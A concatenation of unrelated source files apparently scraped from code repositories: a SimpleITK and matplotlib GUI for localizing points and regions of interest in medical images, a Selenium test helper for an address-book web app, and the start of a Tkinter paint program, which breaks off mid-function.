displayed slices.
"""
# We want to keep the zoom factor which was set prior to display, so we log it before
# clearing the axes.
fixed_xlim = self.fixed_axes.get_xlim()
fixed_ylim = self.fixed_axes.get_ylim()
moving_xlim = self.moving_axes.get_xlim()
moving_ylim = self.moving_axes.get_ylim()
# Draw the fixed image in the first subplot and the localized points.
self.fixed_axes.clear()
self.fixed_axes.imshow(self.fixed_npa[self.fixed_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.fixed_min_intensity,
vmax=self.fixed_max_intensity)
# Positioning the text is a bit tricky, we position relative to the data coordinate system, but we
# want to specify the shift in pixels as we are dealing with display. We therefore (a) get the data
# point in the display coordinate system in pixel units (b) modify the point using pixel offset and
# transform back to the data coordinate system for display.
text_x_offset = -10
text_y_offset = -10
for i, pnt in enumerate(self.fixed_point_indexes):
if pnt[2] == self.fixed_slider.value:
self.fixed_axes.scatter(pnt[0], pnt[1], s=90, marker='+', color=self.text_and_marker_color)
# Get point in pixels.
text_in_data_coords = self.fixed_axes.transData.transform([pnt[0],pnt[1]])
# Offset in pixels and get in data coordinates.
text_in_data_coords = self.fixed_axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.fixed_axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color=self.text_and_marker_color)
self.fixed_axes.set_title('fixed image - localized {0} points'.format(len(self.fixed_point_indexes)))
self.fixed_axes.set_axis_off()
# Draw the moving image in the second subplot and the localized points.
self.moving_axes.clear()
self.moving_axes.imshow(self.moving_npa[self.moving_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.moving_min_intensity,
vmax=self.moving_max_intensity)
for i, pnt in enumerate(self.moving_point_indexes):
if pnt[2] == self.moving_slider.value:
self.moving_axes.scatter(pnt[0], pnt[1], s=90, marker='+', color=self.text_and_marker_color)
text_in_data_coords = self.moving_axes.transData.transform([pnt[0],pnt[1]])
text_in_data_coords = self.moving_axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.moving_axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color=self.text_and_marker_color)
self.moving_axes.set_title('moving image - localized {0} points'.format(len(self.moving_point_indexes)))
self.moving_axes.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
self.fixed_axes.set_xlim(fixed_xlim)
self.fixed_axes.set_ylim(fixed_ylim)
self.moving_axes.set_xlim(moving_xlim)
self.moving_axes.set_ylim(moving_ylim)
self.fig.canvas.draw_idle()
def clear_all(self, button):
"""
Get rid of all the data.
"""
del self.fixed_point_indexes[:]
del self.moving_point_indexes[:]
del self.click_history[:]
self.update_display()
def clear_last(self, button):
"""
Remove last point or point-pair addition (depends on whether the interface is used for localizing point pairs or
evaluation of registration).
"""
if self.click_history:
if self.known_transformation:
self.click_history.pop().pop()
self.click_history.pop().pop()
self.update_display()
def get_points(self):
"""
Get the points in the image coordinate systems.
"""
if(len(self.fixed_point_indexes) != len(self.moving_point_indexes)):
raise Exception('Number of localized points in fixed and moving images does not match.')
fixed_point_list = [self.fixed_image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.fixed_point_indexes]
moving_point_list = [self.moving_image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.moving_point_indexes]
return fixed_point_list, moving_point_list
def __call__(self, event):
"""
Callback invoked when the user clicks inside the figure.
"""
# We add points only in 'edit' mode. If the spatial transformation between the two images is known, self.known_transformation was set,
# then every button_press_event will generate a point in each of the images. Finally, we enforce that all points have a corresponding
# point in the other image by not allowing the user to add multiple points in the same image, they have to add points by switching between
# the two images.
if self.viewing_checkbox.value == 'edit':
if event.inaxes==self.fixed_axes:
if len(self.fixed_point_indexes) - len(self.moving_point_indexes)<=0:
self.fixed_point_indexes.append((event.xdata, event.ydata, self.fixed_slider.value))
self.click_history.append(self.fixed_point_indexes)
if self.known_transformation:
moving_point_physical = self.known_transformation.TransformPoint(self.fixed_image.TransformContinuousIndexToPhysicalPoint(self.fixed_point_indexes[-1]))
moving_point_indexes = self.moving_image.TransformPhysicalPointToIndex(moving_point_physical)
self.moving_point_indexes.append(moving_point_indexes)
self.click_history.append(self.moving_point_indexes)
if self.moving_slider.max>=moving_point_indexes[2] and self.moving_slider.min<=moving_point_indexes[2]:
self.moving_slider.value = moving_point_indexes[2]
self.update_display()
if event.inaxes==self.moving_axes:
if len(self.moving_point_indexes) - len(self.fixed_point_indexes)<=0:
self.moving_point_indexes.append((event.xdata, event.ydata, self.moving_slider.value))
self.click_history.append(self.moving_point_indexes)
if self.known_transformation:
inverse_transform = self.known_transformation.GetInverse()
fixed_point_physical = inverse_transform.TransformPoint(self.moving_image.TransformContinuousIndexToPhysicalPoint(self.moving_point_indexes[-1]))
fixed_point_indexes = self.fixed_image.TransformPhysicalPointToIndex(fixed_point_physical)
self.fixed_point_indexes.append(fixed_point_indexes)
self.click_history.append(self.fixed_point_indexes)
if self.fixed_slider.max>=fixed_point_indexes[2] and self.fixed_slider.min<=fixed_point_indexes[2]:
self.fixed_slider.value = fixed_point_indexes[2]
self.update_display()
class PointDataAquisition(object):
def __init__(self, image, window_level= None, figure_size=(10,8)):
self.image = image
self.npa, self.min_intensity, self.max_intensity = self.get_window_level_numpy_array(self.image, window_level)
self.point_indexes = []
# Create a figure.
self.fig, self.axes = plt.subplots(1,1,figsize=figure_size)
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
ui = self.create_ui()
# Display the data and the controls, first time we display the image is outside the "update_display" method
# as that method relies on the previous zoom factor which doesn't exist yet.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.update_display()
display(ui)
def create_ui(self):
# Create the active UI components. Height and width are specified in 'em' units. This is
# a html size specification, size relative to current font size.
self.viewing_checkbox = widgets.RadioButtons(description= 'Interaction mode:',
options= ['edit', 'view'],
value = 'edit')
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.slice_slider = widgets.IntSlider(description='image z slice:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value = int((self.npa.shape[0]-1)/2),
width='20em')
self.slice_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.slice_slider])
bx1 = widgets.Box(padding=7, children = [self.viewing_checkbox])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),bx0])
def get_window_level_numpy_array(self, image, window_level):
npa = sitk.GetArrayViewFromImage(image)
if not window_level:
return npa, npa.min(), npa.max()
else:
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
# We want to keep the zoom factor which was set prior to display, so we log it before
# clearing the axes.
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
# Draw the image and localized points.
self.axes.clear()
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
# Positioning the text is a bit tricky, we position relative to the data coordinate system, but we
# want to specify the shift in pixels as we are dealing with display. We therefore (a) get the data
# point in the display coordinate system in pixel units (b) modify the point using pixel offset and
# transform back to the data coordinate system for display.
text_x_offset = -10
text_y_offset = -10
for i, pnt in enumerate(self.point_indexes):
if pnt[2] == self.slice_slider.value:
self.axes.scatter(pnt[0], pnt[1], s=90, marker='+', color='yellow')
# Get point in pixels.
text_in_data_coords = self.axes.transData.transform([pnt[0],pnt[1]])
# Offset in pixels and get in data coordinates.
text_in_data_coords = self.axes.transData.inverted().transform((text_in_data_coords[0]+text_x_offset, text_in_data_coords[1]+text_y_offset))
self.axes.text(text_in_data_coords[0], text_in_data_coords[1], str(i), color='yellow')
self.axes.set_title('localized {0} points'.format(len(self.point_indexes)))
self.axes.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.fig.canvas.draw_idle()
def add_point_indexes(self, point_index_data):
self.validate_points(point_index_data)
self.point_indexes.append(list(point_index_data))
self.update_display()
def set_point_indexes(self, point_index_data):
self.validate_points(point_index_data)
del self.point_indexes[:]
self.point_indexes = list(point_index_data)
self.update_display()
def validate_points(self, point_index_data):
for p in point_index_data:
if p[0]>=self.npa.shape[2] or p[0]<0 or p[1]>=self.npa.shape[1] or p[1]<0 or p[2]>=self.npa.shape[0] or p[2]<0:
raise ValueError('Given point (' + ', '.join(map(str,p)) + ') is outside the image bounds.')
def clear_all(self, button):
del self.point_indexes[:]
self.update_display()
def clear_last(self, button):
if self.point_indexes:
self.point_indexes.pop()
self.update_display()
def get_points(self):
return [self.image.TransformContinuousIndexToPhysicalPoint(pnt) for pnt in self.point_indexes]
def get_point_indexes(self):
'''
Return the point indexes, not the continous index we keep.
'''
# Round and then cast to int, just rounding will return a float
return [tuple(map(lambda x: int(round(x)), pnt)) for pnt in self.point_indexes]
def __call__(self, event):
if self.viewing_checkbox.value == 'edit':
if event.inaxes==self.axes:
self.point_indexes.append((event.xdata, event.ydata, self.slice_slider.value))
self.update_display()
def multi_image_display2D(image_list, title_list=None, window_level_list= None, figure_size=(10,8), horizontal=True):
if title_list:
if len(image_list)!=len(title_list):
raise ValueError('Title list and image list lengths do not match')
else:
title_list = ['']*len(image_list)
# Create a figure.
col_num, row_num = (len(image_list), 1) if horizontal else (1, len(image_list))
fig, axes = plt.subplots(row_num, col_num, figsize=figure_size)
if len(image_list)==1:
axes = [axes]
# Get images as numpy arrays for display and the window level settings
npa_list = list(map(sitk.GetArrayViewFromImage, image_list))
if not window_level_list:
min_intensity_list = list(map(np.min, npa_list))
max_intensity_list = list(map(np.max, npa_list))
else:
min_intensity_list = list(map(lambda x: x[1]-x[0]/2.0, window_level_list))
max_intensity_list = list(map(lambda x: x[1]+x[0]/2.0, window_level_list))
# Draw the image(s)
for ax, npa, title, min_intensity, max_intensity in zip(axes, npa_list, title_list, min_intensity_list, max_intensity_list):
ax.imshow(npa,
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
ax.set_title(title)
ax.set_axis_off()
fig.tight_layout()
class MultiImageDisplay(object):
def __init__(self, image_list, axis=0, shared_slider=False, title_list=None, window_level_list= None, figure_size=(10,8), horizontal=True):
self.get_window_level_numpy_array(image_list, window_level_list)
if title_list:
if len(image_list)!=len(title_list):
raise ValueError('Title list and image list lengths do not match')
self.title_list = list(title_list)
else:
self.title_list = ['']*len(image_list)
# Our dynamic slice, based on the axis the user specifies
self.slc = [slice(None)]*3
self.axis = axis
# Create a figure.
col_num, row_num = (len(image_list), 1) if horizontal else (1, len(image_list))
self.fig, self.axes = plt.subplots(row_num,col_num,figsize=figure_size)
if len(image_list)==1:
self.axes = [self.axes]
ui = self.create_ui(shared_slider)
# Display the data and the controls, first time we display the image is outside the "update_display" method
# as that method relies on the previous zoom factor which doesn't exist yet.
for ax, npa, slider, min_intensity, max_intensity in zip(self.axes, self.npa_list, self.slider_list, self.min_intensity_list, self.max_intensity_list):
self.slc[self.axis] = slice(slider.value, slider.value+1)
# Need to use squeeze to collapse degenerate dimension (e.g. RGB image size 124 124 1 3)
ax.imshow(np.squeeze(npa[self.slc]),
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
self.update_display()
display(ui)
def create_ui(self, shared_slider):
# Create the active UI components. Height and width are specified in 'em' units. This is
# a html size specification, size relative to current font size.
ui = None
if shared_slider:
# Validate that all the images have the same size along the axis which we scroll through
sz = self.npa_list[0].shape[self.axis]
for npa in self.npa_list:
if npa.shape[self.axis]!=sz:
raise ValueError('Not all images have the same size along the specified axis, cannot share slider.')
slider = widgets.IntSlider(description='image slice:',
min=0,
max=sz-1,
step=1,
value = int((sz-1)/2),
width='20em')
slider.observe(self.on_slice_slider_value_change, names='value')
self.slider_list = [slider]*len(self.npa_list)
ui = widgets.Box(padding=7, children=[slider])
else:
self.slider_list = []
for npa in self.npa_list:
slider = widgets.IntSlider(description='image slice:',
min=0,
max=npa.shape[self.axis]-1,
step=1,
value = int((npa.shape[self.axis]-1)/2),
width='20em')
slider.observe(self.on_slice_slider_value_change, names='value')
self.slider_list.append(slider)
ui = widgets.Box(padding=7, children=self.slider_list)
return ui
def get_window_level_numpy_array(self, image_list, window_level_list):
# Using GetArray and not GetArrayView because we don't keep references
# to the original images. If they are deleted outside the view would become
# invalid, so we use a copy wich guarentees that the gui is consistent.
self.npa_list = list(map(sitk.GetArrayFromImage, image_list))
if not window_level_list:
self.min_intensity_list = list(map(np.min, self.npa_list))
self.max_intensity_list = list(map(np.max, self.npa_list))
else:
self.min_intensity_list = list(map(lambda x: x[1]-x[0]/2.0, window_level_list))
self.max_intensity_list = list(map(lambda x: x[1]+x[0]/2.0, window_level_list))
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
# Draw the image(s)
for ax, npa, title, slider, min_intensity, max_intensity in zip(self.axes, self.npa_list, self.title_list, self.slider_list, self.min_intensity_list, self.max_intensity_list):
# We want to keep the zoom factor which was set prior to display, so we log it before
# clearing the axes.
xlim = ax.get_xlim()
ylim = ax.get_ylim()
self.slc[self.axis] = slice(slider.value, slider.value+1)
ax.clear()
# Need to use squeeze to collapse degenerate dimension (e.g. RGB image size 124 124 1 3)
ax.imshow(np.squeeze(npa[self.slc]),
cmap=plt.cm.Greys_r,
vmin=min_intensity,
vmax=max_intensity)
ax.set_title(title)
ax.set_axis_off()
# Set the zoom factor back to what it was before we cleared the axes, and rendered our data.
ax.set_xlim(xlim)
ax.set_ylim(ylim)
self.fig.canvas.draw_idle()
class ROIDataAquisition(object):
'''
This class provides a GUI for selecting box shaped Regions Of Interest (ROIs). Each ROI is represented as a
tuple: ((min_x,max_x),(min_y,max_y),(min_z,max_z)).
When using the zoom/pan tool from the toolbar ROI selection is disabled. Once you click again on the zoom/pan
button zooming/panning will be disabled and ROI selection is enabled.
Note that when you are marking the ROI on a slice that is outside the Z-range selected by the
range slider, once you are done selecting the ROI, you will see no change on the current slice. This is the
correct behavior, though initially you may be surprised by it.
'''
def __init__(self, image, window_level= None, figure_size=(10,8)):
self.image = image
self.npa, self.min_intensity, self.max_intensity = self.get_window_level_numpy_array(self.image, window_level)
self.rois = []
# ROI display settings
self.roi_display_properties = dict(facecolor='red', edgecolor='black', alpha=0.2, fill=True)
# Create a figure.
self.fig, self.axes = plt.subplots(1,1,figsize=figure_size)
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
self.roi_selector = RectangleSelector(self.axes, lambda eclick, erelease: None,
drawtype='box', useblit=True,
button=[1, 3], # Left, right buttons only.
minspanx=5, minspany=5, # Ignore motion smaller than 5 pixels.
spancoords='pixels',
interactive=True,
rectprops = self.roi_display_properties)
self.roi_selector.set_visible(False)
ui = self.create_ui()
# Display the data and the controls, first time we display the image is outside the "update_display" method
# as that method relies on the existance of a previous image which is removed from the figure.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.update_display()
display(ui)
def create_ui(self):
# Create the active UI components. Height and width are specified in 'em' units. This is
# a html size specification, size relative to current font size.
self.addroi_button = widgets.Button(description= 'Add ROI',
width= '7em',
height= '3em')
self.addroi_button.on_click(self.add_roi)
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.roi_range_slider = widgets.IntRangeSlider(description= 'ROI z range:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value=[0,self.npa.shape[0]-1],
width='20em')
self.slice_slider = widgets.IntSlider(description='image z slice:',
min=0,
max=self.npa.shape[0]-1,
step=1,
value = int((self.npa.shape[0]-1)/2),
width='20em')
self.slice_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.slice_slider])
bx1 = widgets.Box(padding=7, children = [self.addroi_button])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
bx4 = widgets.Box(padding = 15, children = [self.roi_range_slider])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),widgets.VBox(children=[bx0,bx4])])
def on_slice_slider_value_change(self, change):
self.update_display()
def get_window_level_numpy_array(self, image, window_level):
npa = sitk.GetArrayViewFromImage(image)
# We don't take the minimum/maximum values, just in case there are outliers (top/bottom 2%)
if not window_level:
min_max = np.percentile(npa.flatten(), [2,98])
return npa, min_max[0], min_max[1]
else:
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
def update_display(self):
# Draw the image and ROIs.
# imshow adds an image to the axes, so we also remove the previous one.
self.axes.imshow(self.npa[self.slice_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.min_intensity,
vmax=self.max_intensity)
self.axes.images[0].remove()
# Iterate over all of the ROIs and only display/undisplay those that are relevant.
for roi_data in self.rois:
if self.slice_slider.value>= roi_data[3][0] and self.slice_slider.value<= roi_data[3][1]:
roi_data[0].set_visible(True)
else:
roi_data[0].set_visible(False)
self.axes.set_title('selected {0} ROIs'.format(len(self.rois)))
self.axes.set_axis_off()
self.fig.canvas.draw_idle()
def add_roi_data(self, roi_data):
'''
Add regions of interest to this GUI.
Input is an iterable containing tuples where each tuple contains
three tuples (min_x,max_x),(min_y,max_y), (min_z,max_z). The ROI
is the box defined by these integer values and includes
both min/max values.
'''
self.validate_rois(roi_data)
for roi in roi_data:
self.rois.append((patches.Rectangle((roi[0][0], roi[1][0]),
roi[0][1]-roi[0][0],
roi[1][1]-roi[1][0],
**self.roi_display_properties),
roi[0], roi[1], roi[2]))
self.axes.add_patch(self.rois[-1][0])
self.update_display()
def set_rois(self, roi_data):
'''
Clear any existing ROIs and set the display to the given ones.
Input is an iterable containing tuples where each tuple contains
three tuples (min_x,max_x),(min_y,max_y), (min_z,max_z). The ROI
is the box defined by these integer values and includes
both min/max values.
'''
self.clear_all_data()
self.add_roi_data(roi_data)
def validate_rois(self, roi_data):
for roi in roi_data:
# First element in each tuple is expected to be smaller or equal to the second element.
if roi[0][0]>roi[0][1] or roi[1][0]>roi[1][1] or roi[2][0]>roi[2][1]:
raise ValueError('First element in each tuple is expected to be smaller than second element, error in ROI (' + ', '.join(map(str,roi)) + ').')
# Note that SimpleITK uses x-y-z specification vs. numpy's z-y-x
if roi[0][0]>=self.npa.shape[2] or roi[0][1]<0 or roi[1][0]>=self.npa.shape[1] or roi[1][1]<0 or roi[2][0]>=self.npa.shape[0] or roi[2][0]<0:
raise ValueError('Given ROI (' + ', '.join(map(str,roi)) + ') is outside the image bounds.')
def add_roi(self, button):
if self.roi_selector.visible:
self.roi_selector.set_visible(False)
# Extent is in sub-pixel coordinates, we need it in pixels/voxels.
roi_extent = [int(round(coord)) for coord in self.roi_selector.extents]
# We keep the patch for display and the x,y,z ranges of the ROI.
self.rois.append((patches.Rectangle((roi_extent[0], roi_extent[2]),
roi_extent[1]-roi_extent[0],
roi_extent[3]-roi_extent[2],
**self.roi_display_properties),
(roi_extent[0],roi_extent[1]),
(roi_extent[2],roi_extent[3]),
self.roi_range_slider.value))
self.axes.add_patch(self.rois[-1][0])
self.update_display()
def clear_all_data(self):
for roi_data in self.rois:
roi_data[0].remove()
del self.rois[:]
def clear_all(self, button):
self.clear_all_data()
self.update_display()
def clear_last(self, button):
if self.rois:
self.rois[-1][0].remove()
self.rois.pop()
self.update_display()
def get_rois(self):
'''
Return a list of tuples representing the ROIs. Each tuple contains three tuples (min_x,max_x),
(min_y,max_y), (min_z,max_z). The ROI is the box defined by these integer values and includes
both min/max values.
'''
return [(roi_data[1],roi_data[2],roi_data[3]) for roi_data in self.rois]
def __call__(self, event):
# This is dangerous as we are accessing a "private" variable to find the state
# of the figure's toolbar ('ZOOM',PAN' or None). When Zoom or pan are active we will
# ignore the button press, once the user deactivates the zoom/pan we can allow them
# to select the ROI.
# Discussion on stack overflow with matplotlib developer (circa 2013), no change to date:
# http://stackoverflow.com/questions/20711148/ignore-matplotlib-cursor-widget-when-toolbar-widget-selected
if self.fig.canvas.toolbar._active is None:
self.roi_selector.set_visible(True)
self.addroi_button.disabled = False
self.update_display()
```
|
{
"source": "Jenik-art/task1_1",
"score": 3
}
|
#### File: task1_1/fixture/contact.py
```python
import re
from selenium.webdriver.support.select import Select
from model.contact import Contact
import time
from model.group import Group
import random
from random import randrange
class contactHelper:
def __init__(self, app):
self.app = app
def add(self, contact):
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.contact_cache = None
def fill_contact_form(self, contact):
wd = self.app.wd
self.change_field_value("firstname",contact.firstname)
self.change_field_value("middlename",contact.middlename)
self.change_field_value("lastname",contact.lastname)
self.change_field_value("company",contact.company)
self.change_field_value("address",contact.address)
self.change_field_value("home", contact.homephone)
self.change_field_value("mobile", contact.mobilephone)
self.change_field_value("phone2", contact.secondaryphone)
self.change_field_value("work", contact.workphone)
self.change_field_value("email", contact.email)
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self,index):
wd = self.app.wd
self.choose_contact_by_index(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def choose_contact_by_index(self,index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def click_edit_by_index(self,index):
wd = self.app.wd
wd.find_elements_by_xpath("//table[@id='maintable']/tbody/tr/td[8]/a/img")[index].click()
def click_edit_by_id(self,id):
wd = self.app.wd
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def edit_first_contact(self):
self.edit_contact_by_index(0)
def edit_contact_by_index(self,index,contact):
wd = self.app.wd
self.click_edit_by_index(index)
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def edit_contact_by_id(self,id,contact):
wd = self.app.wd
self.click_edit_by_id(id)
self.fill_contact_form(contact)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
wd.find_element_by_name(field_name).click()
def count(self):
wd = self.app.wd
self.app.open_home_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.app.open_home_page()
self.contact_cache =[]
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
f_name = cells[2].text
l_name = cells[1].text
address= cells[3].text
all_emails=cells[4].text
id = cells[0].find_element_by_tag_name("input").get_attribute("id")
all_phones= cells[5].text
self.contact_cache.append(Contact(lastname=l_name,firstname = f_name, id=id, address=address,
all_emails_from_home_page=all_emails, all_phones_from_home_page=all_phones))
return list(self.contact_cache)
def get_contact_info_from_edit_page(self,index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
address = wd.find_element_by_name("address").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
homephone = wd.find_element_by_name("home").get_attribute("value")
workphone = wd.find_element_by_name("work").get_attribute("value")
mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
secondaryphone = wd.find_element_by_name("phone2").get_attribute("value")
return Contact(lastname=lastname,firstname = firstname, id=id, address=address,email=email, email2=email2, email3=email3, homephone=homephone,workphone=workphone,
mobilephone=mobilephone, secondaryphone= secondaryphone)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
secondaryphone = re.search("P: (.*)", text).group(1)
memberof = re.search("Member of: (.*)", text).group(1)
return Contact(homephone=homephone, workphone=workphone,
mobilephone=mobilephone, secondaryphone=secondaryphone, memberof=memberof)
def open_contact_to_edit_by_index(self,index):
wd = self.app.wd
self.app.open_home_page()
element = wd.find_elements_by_name("entry")[index]
cell = element.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self,index):
wd = self.app.wd
self.app.open_home_page()
element = wd.find_elements_by_name("entry")[index]
cell = element.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def delete_contact_by_id(self, id):
wd = self.app.wd
self.choose_contact_by_id(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
time.sleep(1)
wd.switch_to_alert().accept()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def choose_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def add_contact_to_group(self,index,id):
wd = self.app.wd
self.app.open_home_page()
self.choose_contact_by_index(index)
self.choose_group_for_contact(id)
wd.find_element_by_name("add").click()
def choose_group_for_contact(self,id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='to_group']"))
select.select_by_value('%s' % id)
def choose_group_with_contact(self, id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='group']"))
select.select_by_value('%s' % id)
contacts_in_group = self.get_contact_list()
if contacts_in_group == []:
index = randrange(len(contacts_in_group))
self.add_contact_to_group(index,id)
def delete_contact_from_group(self, index):
wd = self.app.wd
self.choose_contact_by_index(index)
wd.find_element_by_name("remove").click()
wd.find_element_by_link_text("home").click()
self.app.open_home_page()
self.contact_cache = None
def open_group_with_contact_page(self,id):
wd = self.app.wd
select = Select(wd.find_element_by_css_selector("select[name='group']"))
select.select_by_value('%s' % id)
def get_contact_list_from_group_page(self):
if self.contact_cache is None:
wd = self.app.wd
self.contact_cache =[]
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
f_name = cells[2].text
l_name = cells[1].text
address= cells[3].text
all_emails=cells[4].text
id = cells[0].find_element_by_tag_name("input").get_attribute("id")
all_phones= cells[5].text
self.contact_cache.append(Contact(lastname=l_name,firstname = f_name, id=id, address=address,
all_emails_from_home_page=all_emails, all_phones_from_home_page=all_phones))
return list(self.contact_cache)
```
|
{
"source": "jenilchudgar/PaintApp",
"score": 4
}
|
#### File: jenilchudgar/PaintApp/main.py
```python
from tkinter import *
from tkinter import colorchooser,filedialog,messagebox
from PIL import ImageGrab,ImageTk,Image
import tkinter.ttk as ttk
import os
root = Tk()
root.title("Paint App")
root.iconbitmap("icon.ico")
root.geometry("1000x700")
# Brush Color
brush_color = "black"
# Saved = False
saved = False
# Change Color
def change_color(color):
global brush_color
brush_color = color
# Change the size of the brush
def change_brush_size(e):
brush_slider_label.config(text=str(int(brush_slider.get())))
# Draw on the canvas
def draw(e):
# e is to do something
# Brush Parameters
brush_width = int(brush_slider.get())
# Brush Types: BUTT, ROUND, PROJECTING
brush_type = brush_style_type.get()
# Starting Position
x1 = e.x - 1
y1 = e.y - 1
# Ending Position
x2 = e.x + 1
y2 = e.y + 1
# Draw The Line
canvas.create_line(x1,y1,x2,y2,fill=brush_color,smooth=True,width=brush_width,capstyle=brush_type)
# Change Brush Color
def change_brush_color(something_about_which_I_dont_care=None):
global brush_color
brush_color = "black"
brush_color = colorchooser.askcolor(color=brush_color)[1]
# Change Canvas Color
def change_canvas_color():
global canvas_background_color
canvas_background_color = "black"
canvas_background_color = colorchooser.askcolor(color=canvas_background_color)[1]
canvas.config(bg=canvas_background_color)
# Clear Canvas
def clear_canvas(extra_thing_about_which_nobody_cares=None):
canvas.config(bg="white")
canvas.delete(ALL)
# Save image to PNG
def save_to_png(extra_thing_about_which_nobody_cares=None):
file_path = filedialog.asksaveasfilename(initialdir=os.curdir,filetypes=(
("PNG Files","*.png"),
("All Files","*.*"),
))
if not file_path.endswith(".png"):
file_path += ".png"
if file_path:
x=(root.winfo_rootx()*1.25+canvas.winfo_x()*1.25)
y=(root.winfo_rooty()*1.25+canvas.winfo_y()*1.25)
x1=x+canvas.winfo_width()*1.25
y1=y+canvas.winfo_height()*1.25
ImageGrab.grab().crop((x,y,x1,y1)).save(file_path)
# Pop up message box
messagebox.showinfo("Image Saved!","Your Image has been saved successfully.")
global saved
saved = True
# Create New File
def new_file():
if saved:
clear_canvas()
else:
ok = messagebox.askyesno("File Not Saved!","The file on which you are working is not saved, if you continue all progress will be lost.\nDo you want to continue?")
if ok:
clear_canvas()
# Open a file
def open_file():
global img
